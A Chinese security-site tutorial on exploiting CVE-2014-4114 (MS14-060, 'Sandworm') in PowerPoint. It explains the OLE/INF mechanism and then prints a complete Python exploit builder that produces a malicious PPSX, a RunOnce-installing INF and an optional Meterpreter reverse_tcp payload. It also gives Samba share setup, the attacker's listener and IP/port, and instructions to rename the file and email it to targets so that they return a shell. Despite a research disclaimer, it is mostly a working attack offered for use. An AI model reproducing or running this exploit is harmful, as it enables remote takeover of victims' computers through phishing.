沙虫漏洞(CVE-2014-4114)利用测试方法
本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
漏洞时间
2014年10月底
测试目标
装有office2007,office2013的机器。
漏洞说明
此漏洞目前主要被黑客组织用来进行APT(Advanced Persistent Threat)攻击,或者称之为“针对特定目标的攻击”。主要针对政府等大型企业,通过发送邮件的方式进行攻击。
CVE-2014-4114 是OLE包管理INF 任意代码执行漏洞,该漏洞影响Win Vista,Win7等以上操作系统,通过使用PowerPoint作为攻击载体,该漏洞是出现在Microsoft Windows和服务器上的OLE包管理器。在OLE打包文件(packer.dll)中能够下载并执行类似的INF外部文件,允许攻击者执行命令。
利用测试意在了解漏洞的危害,以进行更好的防御。
漏洞原理
1.用到分析工具 filealyzer.
2.通过分析工具我们可以看到这个文件嵌入了两个OLE 对象,如下:
OleObject2.bin中的\\192.9.205.102\share\slides.inf, 字符串,是一个webdav路径,下载后发现是一个INF文件。oleObject1.bin是一个GIF文件。
2.当该文件被PPT加载后,它会调用Packager.dll的CPackage::OLE2MPlayerReadFromStream函数将这两个文件从网络上下载下来并保存在临时目录中。
3.然后在函数CPackage::DoVerb中调用SHELL32!CDefFolderMenu::InvokeCommand函数加载slides.inf,并安装这个inf文件。CPackage::DoVerb的关键代码如下:
4.安装INF的过程最后是通过调用C:\Windows\System32\InfDefaultInstall.exe程序来安装的。如下图:
5.Slide.inf 的内容如下:
6.整个INF的主要功能是将slide1.gif重命名为slide1.gif.exe,然后添加注册表启动项。
漏洞大概原理就是:
执行PPT –> 内置2个OLE对象–> OLE对象包含2个远程webdav地址 –>调用packager.dll的函数CPackage::OLE2MPlayerReadFromStream把远程的 slide1.gif slides.inf 下载下来 —> 函数CPackage::DoVerb中调用SHELL32!CDefFolderMenu::InvokeCommand函数加载slides.inf,并安装这个inf文件–>inf将slide1.gif重命名为slide1.gif.exe。然后添加注册表启动项。
目前已经出现了把恶意代码包含在ppt文件中,但我现在的演示是恶意代码 放在了远程共享上。
漏洞演示
-
vim ms14_060.py 把下面代码复制到ms14_060.py中。
kali中的python可能没有安装pptx模块。
我们手工安装一下。
-
apt-get install python-setuptools easy_install python-pptx
#!/usr/bin/python
import sys, os
import zipfile
import argparse
import subprocess
from shutil import copyfile
from pptx import Presentation
#################################################
############### Args/Usage ###############
#################################################
def get_args():
parser = argparse.ArgumentParser( prog="ms14_060.py",
formatter_class=lambda prog: argparse.HelpFormatter(prog,max_help_position=50),
epilog= '''This script will build a blank PowerPoint show (ppsx) file to exploit the
OLE Remote Code Execution vulnerability identified as MS14-060 (CVE-2014-4114)
Simply pass filename of resulting PPSX and IP Address of remote machine hosting the
share. You can add content to the PPSX file after it has been created.
The script will also create the INF file and an optional Meterpreter
reverse_tcp executable with the -m switch. Alternatively, you can host your own exectuble payload.
Host the INF and GIF (EXE) in an SMB share called "share".
Note: Requires python-pptx''')
parser.add_argument("filename", help="Name of resulting PPSX exploit file")
parser.add_argument("ip", help="IP Address of Remote machine hosting the share")
parser.add_argument("-m", "--msf", help="Set if you want to create Meterpreter gif executable. Pass port (uses ip arg)")
args = parser.parse_args()
return args
# write file
def write_file(filename, contents):
f = open(filename, "w")
f.write(contents)
f.close()
# build bin
def build_bin(embed, ip, share, file):
bin = "\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1" # ole header
bin = bin + "\x00" * 16
bin = bin + "\x3E\x00\x03\x00\xFE\xFF\x09\x00"
bin = bin + "\x06\x00\x00\x00\x00\x00\x00\x00"
bin = bin + "\x00\x00\x00\x00\x01\x00\x00\x00"
bin = bin + "\x01\x00\x00\x00\x00\x00\x00\x00"
bin = bin + "\x00\x10\x00\x00\x02\x00\x00\x00"
bin = bin + "\x01\x00\x00\x00\xFE\xFF\xFF\xFF"
bin = bin + "\x00\x00\x00\x00\x00\x00\x00\x00"
bin = bin + "\xFF" * 432
bin = bin + "\xFD\xFF\xFF\xFF\xFE\xFF\xFF\xFF"
bin = bin + "\xFE\xFF\xFF\xFF\xFE\xFF\xFF\xFF"
bin = bin + "\xFF" * 496
bin = bin + "\x52\x00\x6F\x00\x6F\x00\x74\x00"
bin = bin + "\x20\x00\x45\x00\x6E\x00\x74\x00"
bin = bin + "\x72\x00\x79\x00\x00\x00\x00\x00"
bin = bin + "\x00" * 40
bin = bin + "\x16\x00\x05\x00\xFF\xFF\xFF\xFF"
bin = bin + "\xFF\xFF\xFF\xFF\x01\x00\x00\x00"
bin = bin + "\x02\x26\x02\x00\x00\x00\x00\x00"
bin = bin + "\xC0\x00\x00\x00\x00\x00\x00\x46"
bin = bin + "\x00" * 12
bin = bin + "\xF0\x75\xFD\x41\x63\xB2\xCF\x01"
bin = bin + "\x03\x00\x00\x00\x40\x00\x00\x00"
bin = bin + "\x00\x00\x00\x00\x01\x00\x4F\x00"
bin = bin + "\x4C\x00\x45\x00\x31\x00\x30\x00"
bin = bin + "\x4E\x00\x61\x00\x74\x00\x69\x00"
bin = bin + "\x76\x00\x65\x00\x00\x00\x00\x00"
bin = bin + "\x00" * 36
bin = bin + "\x1A\x00\x02\x01"
bin = bin + "\xFF" * 12
bin = bin + "\x00" * 40
bin = bin + "\x37"
bin = bin + "\x00" * 75
bin = bin + "\xFF" * 12
bin = bin + "\x00" * 116
bin = bin + "\xFF" * 12
bin = bin + "\x00" * 48
bin = bin + "\xFE"
bin = bin + "\xFF" * 511
bin = bin + "\x33\x00\x00\x00" + embed + "\x00" # 3 EmbeddedStgX.txt
bin = bin + "\x5C\x5C" + ip + "\x5C" + share + "\x5C" + file # \\ip\share\file
bin = bin + "\x00" * 460
return bin
def build_vml():
xml = '<xml xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:p="urn:schemas-microsoft-com:office:powerpoint" xmlns:oa="urn:schemas-microsoft-com:office:activation">'
xml = xml + '<o:shapelayout v:ext="edit"><o:idmap v:ext="edit" data="1"/></o:shapelayout><v:shapetype id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f">'
xml = xml + '<v:stroke joinstyle="miter"/><v:formulas><v:f eqn="if lineDrawn pixelLineWidth 0"/><v:f eqn="sum @0 1 0"/><v:f eqn="sum 0 0 @1"/><v:f eqn="prod @2 1 2"/><v:f eqn="prod @3 21600 pixelWidth"/><v:f eqn="prod @3 21600 pixelHeight"/><v:f eqn="sum @0 0 1"/>'
xml = xml + '<v:f eqn="prod @6 1 2"/><v:f eqn="prod @7 21600 pixelWidth"/><v:f eqn="sum @8 21600 0"/><v:f eqn="prod @7 21600 pixelHeight"/><v:f eqn="sum @10 21600 0"/></v:formulas>'
xml = xml + '<v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/><o:lock v:ext="edit" aspectratio="t"/></v:shapetype><v:shape id="_x0000_s1026" type="#_x0000_t75" style="position:absolute; left:100pt;top:-100pt;width:30pt;height:30pt"><v:imagedata o:relid="rId1" o:title=""/></v:shape><v:shape id="_x0000_s1027" type="#_x0000_t75" style="position:absolute; left:150pt;top:-100pt;width:30pt;height:30pt">'
xml = xml + '<v:imagedata o:relid="rId2" o:title=""/></v:shape></xml>'
return xml
def build_xml_rels(ole1, ole2):
xml = '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
xml = xml + '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/' + ole1 + '"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/' + ole2 + '"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/vmlDrawing" Target="../drawings/vmlDrawing1.vml"/></Relationships>'
return xml
def build_xml_slide1():
xml = '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
xml = xml + '<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main"><p:cSld><p:spTree><p:nvGrpSpPr><p:cNvPr id="1" name=""/><p:cNvGrpSpPr/><p:nvPr/></p:nvGrpSpPr><p:grpSpPr><a:xfrm><a:off x="0" y="0"/><a:ext cx="0" cy="0"/><a:chOff x="0" y="0"/><a:chExt cx="0" cy="0"/></a:xfrm></p:grpSpPr><p:graphicFrame><p:nvGraphicFramePr><p:cNvPr id="4" name="Object 3"/><p:cNvGraphicFramePr><a:graphicFrameLocks noChangeAspect="1"/></p:cNvGraphicFramePr><p:nvPr/></p:nvGraphicFramePr><p:xfrm><a:off x="1270000" y="-1270000"/><a:ext cx="381000" cy="381000"/></p:xfrm><a:graphic><a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole"><p:oleObj spid="_x0000_s1026" name="Packager Shell Object" r:id="rId3" imgW="850320" imgH="686880" progId=""><p:embed/></p:oleObj></a:graphicData></a:graphic></p:graphicFrame><p:graphicFrame><p:nvGraphicFramePr><p:cNvPr id="5" name="Object 4"/><p:cNvGraphicFramePr><a:graphicFrameLocks noChangeAspect="1"/></p:cNvGraphicFramePr><p:nvPr/></p:nvGraphicFramePr><p:xfrm><a:off x="1905000" y="-1270000"/><a:ext cx="381000" cy="381000"/></p:xfrm><a:graphic><a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole"><p:oleObj spid="_x0000_s1027" name="Packager Shell Object" r:id="rId4" imgW="850320" imgH="686880" progId=""><p:embed/></p:oleObj></a:graphicData></a:graphic></p:graphicFrame></p:spTree></p:cSld><p:clrMapOvr><a:masterClrMapping/></p:clrMapOvr><p:transition><p:zoom/></p:transition><p:timing><p:tnLst><p:par><p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"><p:childTnLst><p:seq concurrent="1" nextAc="seek"><p:cTn id="2" dur="indefinite" nodeType="mainSeq"><p:childTnLst><p:par><p:cTn id="3" fill="hold"><p:stCondLst><p:cond delay="indefinite"/><p:cond evt="onBegin" delay="0"><p:tn val="2"/></p:cond></p:stCondLst><p:childTnLst><p:par><p:cTn id="4" fill="hold"><p:stCondLst><p:cond delay="0"/></p:stCondLst><p:childTnLst><p:par><p:cTn id="5" presetID="11" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect"><p:stCondLst><p:cond delay="0"/></p:stCondLst><p:childTnLst><p:set><p:cBhvr><p:cTn id="6" dur="1000"><p:stCondLst><p:cond delay="0"/></p:stCondLst></p:cTn><p:tgtEl><p:spTgt spid="4"/></p:tgtEl><p:attrNameLst><p:attrName>style.visibility</p:attrName></p:attrNameLst></p:cBhvr><p:to><p:strVal val="visible"/></p:to></p:set></p:childTnLst></p:cTn></p:par></p:childTnLst></p:cTn></p:par><p:par><p:cTn id="7" fill="hold"><p:stCondLst><p:cond delay="1000"/></p:stCondLst><p:childTnLst><p:par><p:cTn id="8" presetID="11" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect"><p:stCondLst><p:cond delay="0"/></p:stCondLst><p:childTnLst><p:set><p:cBhvr><p:cTn id="9" dur="1000"><p:stCondLst><p:cond delay="0"/></p:stCondLst></p:cTn><p:tgtEl><p:spTgt spid="4"/></p:tgtEl><p:attrNameLst><p:attrName>style.visibility</p:attrName></p:attrNameLst></p:cBhvr><p:to><p:strVal val="visible"/></p:to></p:set><p:cmd type="verb" cmd="-3"><p:cBhvr><p:cTn id="10" dur="1000" fill="hold"><p:stCondLst><p:cond delay="0"/></p:stCondLst></p:cTn><p:tgtEl><p:spTgt spid="4"/></p:tgtEl></p:cBhvr></p:cmd></p:childTnLst></p:cTn></p:par></p:childTnLst></p:cTn></p:par><p:par><p:cTn id="11" fill="hold"><p:stCondLst><p:cond delay="2000"/></p:stCondLst><p:childTnLst><p:par><p:cTn id="12" presetID="11" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect"><p:stCondLst><p:cond delay="0"/></p:stCondLst><p:childTnLst><p:set><p:cBhvr><p:cTn id="13" dur="1000"><p:stCondLst><p:cond delay="0"/></p:stCondLst></p:cTn><p:tgtEl><p:spTgt spid="5"/></p:tgtEl><p:attrNameLst><p:attrName>style.visibility</p:attrName></p:attrNameLst></p:cBhvr><p:to><p:strVal val="visible"/></p:to></p:set><p:cmd type="verb" cmd="3"><p:cBhvr><p:cTn id="14" dur="1000" fill="hold"><p:stCondLst><p:cond delay="0"/></p:stCondLst></p:cTn><p:tgtEl><p:spTgt spid="5"/></p:tgtEl></p:cBhvr></p:cmd></p:childTnLst></p:cTn></p:par></p:childTnLst></p:cTn></p:par></p:childTnLst></p:cTn></p:par></p:childTnLst></p:cTn><p:prevCondLst><p:cond evt="onPrev" delay="0"><p:tgtEl><p:sldTgt/></p:tgtEl></p:cond></p:prevCondLst><p:nextCondLst><p:cond evt="onNext" delay="0"><p:tgtEl><p:sldTgt/></p:tgtEl></p:cond></p:nextCondLst></p:seq></p:childTnLst></p:cTn></p:par></p:tnLst></p:timing></p:sld>'
return xml
def build_xml_content_types():
xml = '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
xml = xml + '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="xml" ContentType="application/xml"/><Default Extension="jpeg" ContentType="image/jpeg"/><Default Extension="bin" ContentType="application/vnd.openxmlformats-officedocument.presentationml.printerSettings"/><Default Extension="vml" ContentType="application/vnd.openxmlformats-officedocument.vmlDrawing"/><Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/><Default Extension="wmf" ContentType="image/x-wmf"/><Override PartName="/ppt/presentation.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideshow.main+xml"/><Override PartName="/ppt/slideMasters/slideMaster1.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/><Override PartName="/ppt/slides/slide1.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/><Override PartName="/ppt/presProps.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.presProps+xml"/><Override PartName="/ppt/viewProps.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.viewProps+xml"/><Override PartName="/ppt/theme/theme1.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/><Override PartName="/ppt/tableStyles.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tableStyles+xml"/><Override PartName="/ppt/slideLayouts/slideLayout1.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout2.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout3.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout4.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout5.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout6.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout7.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout8.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout9.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout10.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout11.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/embeddings/oleObject1.bin" ContentType="application/vnd.openxmlformats-officedocument.oleObject"/><Override PartName="/ppt/embeddings/oleObject2.bin" ContentType="application/vnd.openxmlformats-officedocument.oleObject"/><Override PartName="/docProps/core.xml" ContentType="application/vnd.openxmlformats-package.core-properties+xml"/><Override PartName="/docProps/app.xml" ContentType="application/vnd.openxmlformats-officedocument.extended-properties+xml"/></Types>'
return xml
def build_inf(gif):
exe = gif.split('.')[0] + '.exe'
inf = '[Version]\n'
inf = inf + 'Signature = "$CHICAGO$"\n'
inf = inf + 'Class=61883\n'
inf = inf + 'ClassGuid={7EBEFBC0-3200-11d2-B4C2-00A0C9697D17}\n'
inf = inf + 'Provider=%Microsoft%\n'
inf = inf + 'DriverVer=06/21/2006,6.1.7600.16385\n'
inf = inf + '[DestinationDirs]\n'
inf = inf + 'DefaultDestDir = 1\n'
inf = inf + '[DefaultInstall]\n'
inf = inf + 'RenFiles = RxRename\n'
inf = inf + 'AddReg = RxStart\n'
inf = inf + '[RxRename]\n'
inf = inf + exe + ', ' + gif + '\n'
inf = inf + '[RxStart]\n'
inf = inf + 'HKLM,Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce,Install,,%1%\\' + exe
return inf
def build_presentation(filename):
prs = Presentation()
slide_layout = prs.slide_layouts[6] # blank slide
slide = prs.slides.add_slide(slide_layout)
prs.save(filename)
return
def build_msfpayload(ip, port, file):
cmd = 'msfpayload windows/meterpreter/reverse_tcp LHOST=%s LPORT=%s X > %s' % (ip, port, file)
run_cmd= subprocess.check_output(cmd, shell=True)
subprocess.call(run_cmd, shell=True)
print '[*] Meterpreter Reverse TCP EXE [%s] created.' % (file)
#################################################
############### Main ###############
#################################################
def main():
print
print '============================================================================='
print '| PowerPoint OLE Remote Code Execution (MS14-060 | CVE-2014-4114) |'
print '| Author: Mike Czumak (T_v3rn1x) - @SecuritySift |'
print '=============================================================================\n'
args = get_args() # get the cl args
ip = args.ip
share = "share"
ole1 = "oleObject1.bin"
ole2 = "oleObject2.bin"
vml = "vmlDrawing1.vml"
pptx = "tmp.pptx"
gif = "slide1.gif"
inf = "slides.inf"
# build meterpreter reverse tcp gif file (optional)
if args.msf:
print "[i] Building metasploit reverse_tcp executable"
build_msfpayload(args.ip, args.msf, gif)
# build the bin, inf and vml files
gif_bin = build_bin("EmbeddedStg1.txt", ip, share, gif)
inf_bin = build_bin("EmbeddedStg2.txt", ip, share, inf)
draw_vml = build_vml()
rem_inf = build_inf(gif)
write_file(inf, rem_inf)
print ("[*] INF file [%s] created " % inf)
# build the xml files
xml_rel = build_xml_rels(ole1, ole2)
xml_slide1 = build_xml_slide1()
xml_content = build_xml_content_types()
# build blank temp pptx presentation to convert to ppsx
build_presentation(pptx)
zippptx = pptx + ".zip"
os.rename(pptx, zippptx) # rename to zip for modification
# open temp pptx and a copy for modification
zin = zipfile.ZipFile(zippptx, 'r')
zippptx_copy = "copy_" + zippptx
zout = zipfile.ZipFile(zippptx_copy, "w")
# modify the pptx template with exploit
for item in zin.infolist():
if (item.filename == "ppt/slides/slide1.xml"):
zout.writestr(item, xml_slide1) # replace slide 1 contents
elif (item.filename == "ppt/slides/_rels/slide1.xml.rels"):
zout.writestr(item, xml_rel) # replace slide 1 rels
elif (item.filename == "[Content_Types].xml"):
zout.writestr(item, xml_content) # replace content_types
else:
buffer = zin.read(item.filename)
zout.writestr(item,buffer) # use existing file
zout.writestr("ppt/embeddings/" + ole1, gif_bin)
zout.writestr("ppt/embeddings/"+ole2, inf_bin)
zout.writestr("ppt/drawings/vmlDrawing1.vml", draw_vml)
zout.close()
zin.close()
# convert to ppsx
os.rename(zippptx_copy, args.filename)
os.remove(zippptx)
print ("[*] Exploit PPSX file [%s] created" % (args.filename))
print ("[i] Place INF and GIF (EXE) payload file (called %s) in an SMB share called 'share'" % (gif))
print
if __name__ == '__main__':
main()
2.在kali系统搭建smb服务。把下面代码复制到 /etc/samba/smb.conf 中。
[global] security=share username map = /etc/samba/smbusers display charset = UTF-8 unix charset = UTF-8 dos charset = cp936 workgroup = WORKGROUP dns proxy = no log file = /var/log/samba/log.%m max log size = 1000 syslog = 0 panic action = /usr/share/samba/panic-action %d server role = standalone server passdb backend = tdbsam obey pam restrictions = yes unix password sync = yes passwd program = /usr/bin/passwd %u passwd chat = *Enter\snew\s*\spassword:* %n\n *Retype\snew\s*\spassword:* %n\n *password\supdated\ssuccessfully* . pam password change = yes map to guest = bad user ; logon path = \\%N\profiles\%U ; logon drive = H: ; logon script = logon.cmd ; add user script = /usr/sbin/adduser --quiet --disabled-password --gecos "" %u ; add machine script = /usr/sbin/useradd -g machines -c "%u machine account" -d /var/lib/samba -s /bin/false %u ; add group script = /usr/sbin/addgroup --force-badname %g ; include = /home/samba/etc/smb.conf.%m ; idmap uid = 10000-20000 ; idmap gid = 10000-20000 ; template shell = /bin/bash ; usershare max shares = 100 usershare allow guests = yes [homes] comment = Home Directories browseable = no read only = yes create mask = 0700 directory mask = 0700 valid users = %S ;[netlogon] ; comment = Network Logon Service ; path = /home/samba/netlogon ; guest ok = yes ; read only = yes ;[profiles] ; comment = Users profiles ; path = /home/samba/profiles ; guest ok = no ; browseable = no ; create mask = 0600 ; directory mask = 0700 [printers] comment = All Printers browseable = no path = /var/spool/samba printable = yes guest ok = no read only = yes create mask = 0700 [print$] comment = Printer Drivers path = /var/lib/samba/printers browseable = yes read only = yes guest ok = no ; write list = root, @lpadmin [share] path = /tmp/share browseable = yes guest ok = yes read only =yes writable = no
mkdir /tmp/share
/etc/init.d/samba restart
3.执行下面命令。
python ms14_060.py sploit.pptx 192.9.205.174 -m 7777
产生一个a.ppsx 的文件。和一个slide1.gif的木马文件,slides.inf 的文件 slide1.gif中的攻击载荷为 meterpreter/reverce_tcp木马连接本地IP 192.9.205.174:7777 端口
生成的 aa.ppsx中可以写任何东西,普通PPT文件。
本地监听 7777端口。
修改ppsx内容。
修改名称,以邮件或者各种方式发给需要攻击者。
攻击者打开,反弹回shell
[本文由作者dalin撰写并投稿 ]